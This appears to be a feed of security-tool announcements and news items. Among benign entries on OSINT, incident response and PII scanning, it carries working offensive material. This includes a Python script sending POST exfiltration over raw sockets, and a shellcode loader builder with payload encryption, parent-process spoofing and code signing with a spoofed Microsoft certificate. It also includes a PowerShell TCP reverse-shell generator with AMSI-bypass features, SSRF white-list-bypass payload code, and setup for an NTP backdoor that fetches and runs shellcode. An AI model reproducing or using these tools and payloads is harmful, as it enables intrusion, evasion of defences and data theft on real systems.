FreshRSS


NetLlix - A Project Created With An Aim To Emulate And Test Exfiltration Of Data Over Different Network Protocols


A project created with an aim to emulate and test exfiltration of data over different network protocols. The emulation is performed without the use of native APIs. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.


Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the programming/scripting languages mentioned below:

  • CNet/WebClient: Developed in C to generate network traffic using the well-known WIN32 APIs (WININET & WINHTTP) and raw socket programming (a raw-socket sketch follows the Usage section below).
  • HashNet/WebClient: A C# binary to generate network traffic using .NET classes like HttpClient and WebRequest, as well as raw sockets.
  • PowerNet/WebClient: PowerShell scripts to generate network traffic using socket programming.

Usage:

Download the latest ZIP from the releases page.

Running the server:

  • With SSL: python3 HTTP-S-EXFIL.py ssl

  • Without SSL: python3 HTTP-S-EXFIL.py

Running the client:

  • CNet - CNet.exe <Server-IP-ADDRESS> - Select any option
  • HashNet - ChashNet.exe <Server-IP-ADDRESS> - Select any option
  • PowerNet - .\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>
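
For reference, here is a minimal Python sketch (not part of NetLlix) of the kind of traffic the clients generate: a GET beacon and a POST carrying data, sent over a raw TCP socket rather than through a high-level HTTP library. The server address and the /ping and /upload paths are placeholders.

import socket

SERVER_IP = "192.168.1.10"  # placeholder: host running HTTP-S-EXFIL.py
PORT = 80

def send_raw(request: bytes) -> bytes:
    # Open a plain TCP connection and speak HTTP by hand
    with socket.create_connection((SERVER_IP, PORT), timeout=5) as s:
        s.sendall(request)
        return s.recv(4096)

# GET beacon
get_req = (f"GET /ping HTTP/1.1\r\nHost: {SERVER_IP}\r\n"
           "Connection: close\r\n\r\n").encode()
print(send_raw(get_req))

# POST exfil: the data travels in the request body
data = b"secret=exfiltrated-bytes"
post_req = (f"POST /upload HTTP/1.1\r\nHost: {SERVER_IP}\r\n"
            f"Content-Length: {len(data)}\r\n"
            "Connection: close\r\n\r\n").encode() + data
print(send_raw(post_req))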


laZzzy - Shellcode Loader, Developed Using Different Open-Source Libraries, That Demonstrates Different Execution Techniques


laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.

Features

  • Direct syscalls and native (Nt*) functions (not all functions but most)
  • Import Address Table (IAT) evasion
  • Encrypted payload (XOR and AES; see the sketch after this list)
    • Randomly generated key
    • Automatic padding (if necessary) of payload with NOPS (\x90)
    • Byte-by-byte in-memory decryption of payload
  • XOR-encrypted strings
  • PPID spoofing
  • Blocking of non-Microsoft-signed DLLs
  • (Optional) Cloning of PE icon and attributes
  • (Optional) Code signing with spoofed cert
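
The XOR side of the payload preparation described above can be illustrated with a short Python sketch. This is not laZzzy's actual builder code, just a minimal demonstration, assuming a 16-byte random key and NOP padding to a block boundary:

import os

def prepare(shellcode: bytes, block: int = 16):
    # Pad with NOPs (\x90) so the length is a multiple of the block size
    if len(shellcode) % block:
        shellcode += b"\x90" * (block - len(shellcode) % block)
    key = os.urandom(16)  # randomly generated key
    enc = bytes(b ^ key[i % len(key)] for i, b in enumerate(shellcode))
    return enc, key

enc, key = prepare(b"\xfc\x48\x83\xe4\xf0")  # dummy bytes, not real shellcode
print(key.hex(), enc.hex())
# At run time the loader reverses this with the same XOR, byte by byte in memory.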

How to Use

Requirements:

  • Windows machine w/ Visual Studio and the following components, which can be installed from Visual Studio Installer > Individual Components:

    • C++ Clang Compiler for Windows and C++ Clang-cl for build tools

    • ClickOnce Publishing

  • Python3 and the required modules:

    • python3 -m pip install -r requirements.txt

Options:

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h

⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣿⣯ ⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀

usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]

options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)

shellcode execution method:
1 Early-bird APC Queue (requires sacrificial process)
2 Thread Hijacking (requires sacrificial process)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard

Example:

Execute builder.py and supply the necessary data.

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe

⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀ ⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀

[+] XOR-encrypting payload with
[*] Key: d3b666606468293dfa21ce2ff25e86f6

[+] AES-encrypting payload with
[*] IV: f96312f17a1a9919c74b633c5f861fe5
[*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec

[+] Modifying template using
[*] Technique: Early-bird APC Queue
[*] Process to inject: None
[*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe
[*] Parent process to spoof: svchost.exe

[+] Spoofing metadata
[*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe
[*] CompanyName: Microsoft Corporation
[*] FileDescription: Runtime Broker
[*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800)
[*] InternalName: RuntimeBroker.exe
[*] LegalCopyright: © Microsoft Corporation. All rights reserved.
[*] OriginalFilename: RuntimeBroker.exe
[*] ProductName: Microsoft® Windows® Operating System
[*] ProductVersion: 10.0.22621.608

[+] Compiling project
[*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe

[+] Signing binary with spoofed cert
[*] Domain: www.microsoft.com
[*] Version: 2
[*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6
[*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06
[*] Not Before: October 04 2022
[*] Not After: September 29 2023
[*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx

[+] All done!
[*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe

Libraries Used

Shellcode Execution Techniques

  1. Early-bird APC Queue (requires sacrificial process)
  2. Thread Hijacking (requires sacrificial process)
  3. KernelCallbackTable (requires sacrificial process that has a GUI)
  4. Section View Mapping
  5. Thread Suspension
  6. LineDDA Callback
  7. EnumSystemGeoID Callback
  8. Fiber Local Storage (FLS) Callback
  9. SetTimer
  10. Clipboard

Notes:

  • Only works on Windows x64
  • Debugging only works in Release mode
  • Sometimes, KernelCallbackTable doesn't work on the first run but will eventually work afterward

Credits/References



Octosuite - Advanced Github OSINT Framework


A framework for gathering OSINT on GitHub users, repositories and organizations


Wiki

Refer to the Wiki for installation instructions, in addition to all other documentation.

Features

  • Fetches an organization's profile information
  • Fetches an organization's events
  • Returns an organization's repositories
  • Returns an organization's public members
  • Fetches a repository's information
  • Returns a repository's contributors
  • Returns a repository's languages
  • Fetches a repository's stargazers
  • Fetches a repository's forks
  • Fetches a repository's releases
  • Returns a list of files in a specified path of a repository
  • Fetches a user's profile information
  • Returns a user's gists
  • Returns organizations that a user owns/belongs to
  • Fetches a user's events
  • Fetches a list of users followed by the target
  • Fetches a user's followers
  • Checks if user A follows user B
  • Checks if a user is a public member of an organization
  • Returns a user's subscriptions
  • Searches users
  • Searches repositories
  • Searches topics
  • Searches issues
  • Searches commits
  • Automatically logs network activity (.logs folder)
  • User can view, read and delete logs
  • ...And more

Note

Octosuite automatically logs network and user activity for each session; the logs are saved by date and time in the .logs folder. A sketch of the kind of API lookups behind the features above follows.
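
These features map onto the public GitHub REST API. Below is a minimal sketch of the kind of lookups involved, using the standard api.github.com endpoints directly (this is not Octosuite's internal code):

import requests

API = "https://api.github.com"

def org_profile(org: str) -> dict:
    # GET /orgs/{org} returns the organization's profile information
    return requests.get(f"{API}/orgs/{org}", timeout=10).json()

def org_repos(org: str) -> list:
    # GET /orgs/{org}/repos returns the organization's repositories
    return requests.get(f"{API}/orgs/{org}/repos", timeout=10).json()

def user_followers(user: str) -> list:
    # GET /users/{user}/followers returns a user's followers
    return requests.get(f"{API}/users/{user}/followers", timeout=10).json()

profile = org_profile("github")
print(profile.get("name"), profile.get("public_repos"))
for repo in org_repos("github")[:5]:
    print(repo["full_name"], repo["stargazers_count"])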



Malware Strains Targeting Python and JavaScript Developers Through Official Repositories

An active malware campaign is targeting the Python Package Index (PyPI) and npm repositories for Python and JavaScript with typosquatted and fake modules that deploy a ransomware strain, marking the latest security issue to affect software supply chains. The typosquatted Python packages all impersonate the popular requests library: dequests, fequests, gequests, rdquests, reauests, reduests,

Pylirt - Python Linux Incident Response Toolkit


This application aims to accelerate incident response by collecting information from Linux operating systems.


Features

Information is collected from the following sources:

/etc/passwd

cat /etc/group

cat /etc/sudoers

lastlog

cat /var/log/auth.log

uptime

cat /proc/meminfo

ps aux

/etc/resolv.conf

/etc/hosts

iptables -L -v -n

find / -type f -size +512k -exec ls -lh {} \;

find / -mtime -1 -ls

ip a

netstat -nap

arp -a

echo $PATH

Installation

git clone https://github.com/anil-yelken/pylirt

cd pylirt

sudo pip3 install paramiko

Usage

The following information should be specified in the cred_list.txt file:

IP|Username|Password

sudo python3 plirt.py
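
For illustration, here is a minimal sketch, assuming the cred_list.txt format above, of how such collection can be driven over SSH with paramiko. This is not pylirt's actual code; the command list and report file name are examples:

import paramiko

COMMANDS = ["cat /etc/passwd", "lastlog", "ps aux", "ip a", "netstat -nap"]

with open("cred_list.txt") as f:
    creds = [line.strip().split("|") for line in f if line.strip()]

for ip, username, password in creds:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, username=username, password=password, timeout=10)
    with open(f"{ip}_report.txt", "w") as report:
        for cmd in COMMANDS:
            # Run each collection command and append its output to the report
            stdin, stdout, stderr = client.exec_command(cmd)
            report.write(f"### {cmd}\n{stdout.read().decode()}\n")
    client.close()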

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Shells - Little Script For Generating Revshells


A script for generating common revshells quickly and easily.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA to get correctly formatted.
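
The formatting pain is real: PowerShell's -EncodedCommand, for instance, expects Base64 over a UTF-16LE encoded command. Here is a rough Python sketch of generating such a payload (this is not the shells script itself; the one-liner is a generic TCP reverse shell):

import base64

def psh_tcp_revshell(ip: str, port: int) -> str:
    # A generic PowerShell TCP reverse shell one-liner
    cmd = (
        f"$c=New-Object Net.Sockets.TCPClient('{ip}',{port});"
        "$s=$c.GetStream();[byte[]]$b=0..65535|%{0};"
        "while(($i=$s.Read($b,0,$b.Length)) -ne 0){"
        "$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);"
        "$r=(iex $d 2>&1|Out-String);"
        "$sb=([text.encoding]::ASCII).GetBytes($r);"
        "$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"
    )
    # -EncodedCommand requires Base64 of the UTF-16LE bytes, not UTF-8
    b64 = base64.b64encode(cmd.encode("utf-16-le")).decode()
    return f"powershell -nop -w hidden -e {b64}"

print(psh_tcp_revshell("10.10.10.10", 443))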

PowerShell revshells

  • Shows username@computer and the working directory above the prompt
  • Has a partial AMSI-bypass, making some stuff a bit easier
  • TCP and UDP
  • Windows Powershell and Core Powershell
  • Functions for uploading and downloading files. (Using Updog by sc0tfree)

ngrok support

  • ngrok can be started/stopped from inside the script
  • payloads will be generated with the ngrok addresses

Updog support

  • you can start/stop Updog from inside the script
  • The PowerShell revshells have upload/download function embedded
  • To upload from nix using curl: curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload

To install Shells

git clone https://github.com/4ndr34z/shells
cd shells
./install.sh

Screenshots

Youtube video


Version 1.4.6

  • Added webshells (ASPX, PHP, JSP)

Version 1.4.5

  • Added 2 c++ revshell binaries for Windows 32 and 64 bit.

Version 1.4.4

  • Fixed the handling of starting/stopping Updog

Version 1.4.3

  • Added Updog support
  • Added Netcat binaries.
  • Powershell: Created upload/download functionality (upload requires Updog for receiving files)
  • Added more information about running ngrok and Updog.

Version 1.4.2

  • PowerShell: Added a new "mini AMSI-bypass" (it is a partial bypass), based on Matt Graeber's reflection method
  • PowerShell: Added an "upload" function to the PowerShell reverse shell

Version 1.4.1

  • Removed AMSI. Not tested enough :-)

Version 1.4

  • Added AMSI-bypass for the powershell payloads

Version 1.3.9

  • Fixed bug when setting port
  • Changed default port to 443
  • PowerShell: obfuscated some more

Version 1.3.8

  • PowerShell: Minor changes to the UDP payload

Version 1.3.7

  • Using only native nc on macOS, because the one on homebrew doesn't work on incoming UDP
  • PowerShell: Added UDP payloads

Version 1.3.6

  • PowerShell: Added more payloads

Version 1.3.5

Version 1.3.4

  • PowerShell: Using UTF8 encoding in payload

Version 1.3.3

  • Added Golang

Version 1.3.2

  • Added OpenSSL

Version 1.3.1

  • Fixed bug in Python revshell
  • Added awk
  • Added Bash UDP

Version 1.3

  • Added Windows Python revshells

Version 1.2.9

  • Added a ngrok running-status

Version 1.2.8

  • Hiding ngrok choice if not installed

Version 1.2.7

  • Fixed the install options: no longer runs the default option when pressing Enter without making a choice

Version 1.2.6

  • Added support for ngrok.

Version 1.2.4

  • Added an install script
  • Added install options for checking and installing missing dependencies

Version 1.2.3

  • Added a couple of PHP shells

Version 1.2.2

  • Added shells for: Ruby, Perl, Telnet and zsh

Version 1.2.1

  • Added copy to clipboard using pbcopy on macOS
  • Added info about listening netcat, as the macOS versions don't display that

Version 1.2

  • Added looping netcat shells. Calls back every 10 seconds. Great in case you lose your shell
  • Added check for GNU netcat 0.7.0 (Homebrew) when running on macOS

Version 1.1

  • Added support for macOS


Octopii - An AI-powered Personal Identifiable Information (PII) Scanner


Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.


Working

Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:

1. Importing and cleaning image(s)

The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.

2. Performing image classification and Optical Character Recognition (OCR)

A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:

  • Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.

  • Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.

  • Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.

  • Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.

As a final verification method, images are scanned for certain strings to verify the accuracy of the model.

The accuracy of the scan can be determined via the confidence scores in the output. If all the mentioned conditions are met, a score of 100.0 is returned.

To train the model, data can also be fed into the model_generator.py script, and the newly improved h5 file can be used.
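
A rough Python sketch of the classify-then-OCR flow described above (not Octopii's actual code; the exact input size and normalization depend on the exported model, and the keyword check here is a made-up example):

import numpy as np
import pytesseract
from PIL import Image
from tensorflow.keras.models import load_model

model = load_model("models/keras_model.h5")
labels = [line.strip() for line in open("models/labels.txt")]

def scan(path: str):
    # 1. Image classification: resize, normalize, predict
    img = Image.open(path).convert("RGB").resize((224, 224))
    batch = np.expand_dims(np.asarray(img, dtype=np.float32) / 255.0, 0)
    scores = model.predict(batch)[0]
    label, score = labels[int(scores.argmax())], float(scores.max()) * 100
    # 2. OCR: look for expected substrings as the final check
    text = pytesseract.image_to_string(Image.open(path))
    confirmed = any(word in text for word in ("Passport", "License"))
    return label, score, confirmed

print(scan("pii_list/sample.jpg"))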

Usage

  1. Install all dependencies via pip install -r requirements.txt.
  2. Install the Tesseract helper locally via sudo apt install tesseract-ocr -y (for Ubuntu/Debian).
  3. To run Octopii, type python3 octopii.py <location to scan> <additional flags>, for example python3 octopii.py pii_list/

Octopii currently supports local scanning, as well as scanning S3 directories and open directory listings via their URLs.

Example

Contributing

Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:

1. Fork

Fork the official repository at https://github.com/redhuntlabs/octopii

2. Understand

There are 3 files in the models/ directory:

  • The keras_models.h5 file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python.
  • The labels.txt file contains the list of labels corresponding to the index that the model returns.
  • The ocr_list.json file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions etc.

Generating models via Teachable Machine

Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy to use model generator called the Teachable Machine. To use it:

  • Visit https://teachablemachine.withgoogle.com/train and select 'Image Project' → 'Standard Image Model'.
  • A few classes are visible. Rename each class to an asset type you'd like to upload, such as "German Passport" or "California Driver License".
  • Add images by clicking the 'Upload' button and upload some image assets. Note: images have to be square

Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.

  • Click '+ Add a class' at the bottom of the page to add more classes with data and repeat. You can make the classes more specific, such as "Goa Driver License Old Format".

Note: Only upload images matching the class name; for example, the German Passport class must contain only German Passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.

  • Verify the classes and images one last time. Once you're ready, click on the 'Train Model' button. You can increase the epoch size (such as 5000) to improve model accuracy.
  • To test the model, click the Input dropdown, select 'File', and upload a sample image.
  • Once you're ready, click the 'Export Model' button. In the dialog that pops up, select the 'Tensorflow' tab (not Tensorflow.js) and select the 'Keras' radio button, then click 'Download my model' to export the newly generated model. Extract the downloaded zip file and paste the keras_model.h5 file and labels.txt file into the models/ directory in Octopii.

The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII. Make sure the images are roughly square.

Updating OCR list

Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:

  • Open the existing ocr_list.json file. Create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
  • For the keywords, use as many unique terms from your asset as possible, such as "Income Tax Department". Store them in a JSONArray.
  • (Advanced) you can also add regexes for things like ID numbers and MRZ on passports if they are unique enough. Use https://regex101.com to test your regexes before adding them.
  • Save/overwrite the existing ocr_list.json file. (A hypothetical entry is sketched below.)
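
For example, a hypothetical entry could look like the following, built and round-tripped with Python's json module so the file stays valid. The class name, keywords, regex, and field names here are illustrative assumptions; mirror the structure of the real ocr_list.json:

import json

entry = {
    "India PAN Card": {  # key must exactly match the model's class name
        "keywords": ["Income Tax Department", "Permanent Account Number"],
        "regexes": ["[A-Z]{5}[0-9]{4}[A-Z]"],  # example ID-number pattern
        "country": "IN",  # ISO 3166-1 alpha-2
    }
}

with open("models/ocr_list.json") as f:
    ocr_list = json.load(f)  # load the existing file
ocr_list.update(entry)

with open("models/ocr_list.json", "w") as f:
    json.dump(ocr_list, f, indent=2)  # json.dump keeps the output valid JSON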

3. Edit

Replace the files in the models/ directory with the ones you created or edited via the above methods.

4. Pull request

Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.

Note: Please take the following steps to ensure quality

  • Make sure the model returns extremely accurate results by testing it locally first.
  • Use proper text casing for label names in both the Keras model and ocr_list.json.
  • Make sure all JSON is valid with appropriate character escapes with no duplicate keys, regexes or keywords.
  • For country names, please use the ISO 3166-1 alpha-2 code of the country.

Credits

License

MIT License

(c) Copyright 2022 RedHunt Labs Private Limited

Author: Owais Shaikh



autoSSRF - Smart Context-Based SSRF Vulnerability Scanner


autoSSRF is your best ally for identifying SSRF vulnerabilities at scale. Unlike other SSRF automation tools, this one comes with the following two original features:

  • Smart fuzzing on relevant SSRF GET parameters

    When fuzzing, autoSSRF only focuses on the common parameters related to SSRF (?url=, ?uri=, ..) and doesn't interfere with anything else. This ensures that the original URL is still correctly understood by the tested web application, something that might not happen with a tool that blindly sprays query parameters.

  • Context-based dynamic payloads generation

    For the given URL https://host.com/?fileURL=https://authorizedhost.com, autoSSRF would recognize authorizedhost.com as a potentially white-listed host for the web application, and generate payloads dynamically based on that, attempting to bypass the white-listing validation. This results in interesting payloads such as http://authorizedhost.attacker.com, http://authorizedhost%252F@attacker.com, etc.

Furthermore, this tool produces almost no false positives. The detection relies on ProjectDiscovery's excellent interactsh, allowing autoSSRF to confidently identify out-of-band DNS/HTTP interactions. A sketch of the payload-generation idea follows.
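
The context-based idea can be sketched in a few lines of Python (this is not autoSSRF's actual code): take the host already present in a parameter value and derive white-list-bypass candidates from it, matching the payload shapes shown above.

from urllib.parse import urlparse, parse_qs

def payloads(url: str, collaborator: str = "attacker.com") -> list:
    params = parse_qs(urlparse(url).query)
    out = []
    for values in params.values():
        for v in values:
            host = urlparse(v).hostname  # e.g. authorizedhost.com
            if not host:
                continue
            out += [
                f"http://{host}.{collaborator}",       # attacker subdomain
                f"http://{host}%252F@{collaborator}",  # double-encoded slash
                f"http://{collaborator}#{host}",       # fragment trick
                f"http://{collaborator}?{host}",       # query trick
            ]
    return out

for p in payloads("https://host.com/?fileURL=https://authorizedhost.com"):
    print(p)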


Usage

python3 autossrf.py -h

This displays help for the tool.

usage: autossrf.py [-h] [--file FILE] [--url URL] [--output] [--verbose]

options:
-h, --help show this help message and exit
--file FILE, -f FILE file of all URLs to be tested against SSRF
--url URL, -u URL url to be tested against SSRF
--output, -o output file path
--verbose, -v activate verbose mode

Single URL target:

python3 autossrf.py -u https://www.host.com/?param1=X&param2=Y&param2=Z

Multiple URLs target with verbose:

python3 autossrf.py -f urls.txt -v

Installation

1 - Clone

git clone https://github.com/Th0h0/autossrf.git

2 - Install requirements

Python libraries :

cd autossrf 
pip install -r requirements.txt

Interactsh-Client :

go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

License

autoSSRF is distributed under MIT License.



Researchers Uncover PyPI Package Hiding Malicious Code Behind Image File

A malicious package discovered on the Python Package Index (PyPI) has been found employing a steganographic trick to conceal malicious code within image files. The package in question, named "apicolor," was uploaded to the Python third-party repository on October 31, 2022, and described as a "Core lib for REST API," according to Israeli cybersecurity firm Check Point. It has since been taken

Researchers Uncover 29 Malicious PyPI Packages Targeted Developers with W4SP Stealer

Cybersecurity researchers have uncovered 29 packages in Python Package Index (PyPI), the official third-party software repository for the Python programming language, that aim to infect developers' machines with a malware called W4SP Stealer. "The main attack seems to have started around October 12, 2022, slowly picking up steam to a concentrated effort around October 22," software supply chain

Sandman - NTP Based Backdoor For Red Team Engagements In Hardened Networks


Sandman is a backdoor that is meant to work on hardened networks during red team engagements.

Sandman works as a stager and leverages NTP (a protocol to sync time and date) to fetch and run arbitrary shellcode from a pre-defined server.

Because NTP is a protocol that many defenders overlook, it usually enjoys wide network accessibility.


Usage

SandmanServer (Usage)

Run on windows / *nix machine:

python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
  • Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).

  • Payload Url: The URL to your shellcode; it could be your agent (for example, CobaltStrike or Meterpreter) or another stager.

  • IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).

SandmanBackdoor (Usage)

To start, compile the SandmanBackdoor as mentioned below. Because it is a single lightweight C# executable, you can execute it via ExecuteAssembly, run it as an NTP provider, or just execute/inject it.

SandmanBackdoorTimeProvider (Usage)

To use it, you will need to follow simple steps:

  • Add the following registry value:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
  • Restart the w32time service:
sc stop w32time
sc start w32time

NOTE: Make sure you are compiling with the x64 option and not the Any CPU option!

Capabilities

  • Getting and executing an arbitrary payload from an attacker's controlled server.

  • Can work on hardened networks, since NTP is usually allowed through firewalls.

  • Impersonating a legitimate NTP server via IP spoofing.

Setup

SandmanServer (Setup)

SandmanBackdoor (Setup)

To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either with USE_SHELLCODE defined, to use Orca's shellcode, or without USE_SHELLCODE to use WebClient.

SandmanBackdoorTimeProvider (Setup)

